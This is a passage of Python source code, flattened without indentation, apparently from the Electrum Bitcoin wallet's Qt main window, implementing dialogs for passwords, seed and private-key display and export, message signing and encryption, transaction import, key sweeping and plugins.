sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self):
if self.question(_(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")):
self.wallet.init_lightning()
self.show_message("Lightning keys created. Please restart Electrum")
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('warning.png'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(self.init_lightning_dialog)
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except UserFacingException as e:
self.show_error(e)
return
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
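# Thread/GUI coordination for the export: the worker thread emits
# computing_privkeys_signal after each derived key (progress text),
# show_privkeys_signal fills the text box when all keys are ready, and
# on_dialog_closed sets `cancelled` so the worker stops early if the
# dialog is dismissed.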
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
